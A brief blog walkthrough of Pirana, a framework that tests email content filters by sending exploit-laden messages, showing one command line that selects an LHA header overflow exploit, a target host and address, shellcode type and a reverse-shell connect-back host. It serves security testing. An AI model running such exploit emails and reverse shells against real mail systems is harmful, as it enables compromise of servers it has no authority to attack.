Pirana is an exploitation framework that tests the security of a email content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering platform.
(Source: http://www.it-observer.com/tools/34/pirana_smtp_content_exploitation_framework/)

Pirana with all it’s options:

We will try out some of the options in Pirana. First we have to compile the exploits.

Than we will will run this command: pirana.pl -e 1 -h linuxhaxor.net -a pavs@linuxhaxor.net -s 0 -l linuxhaxor.net – 80

Here -e stands for exploit, and of the six available exploits we are using exploit 1, which is “LHA get_header Directory name overflow”

-h stands for host name; -a stands for destination e-mail addie; -s for shellcode types there are 3 types available; finally -l stands for the host to connect back to in reverse shell mode.

We tried the command once with -v, to attach EICAR virus and once without the virus.

And the outcome:

Tada…

There are many combinations of options to play with, but you get an idea of it once you start playing around with it.

That’s all!

pavs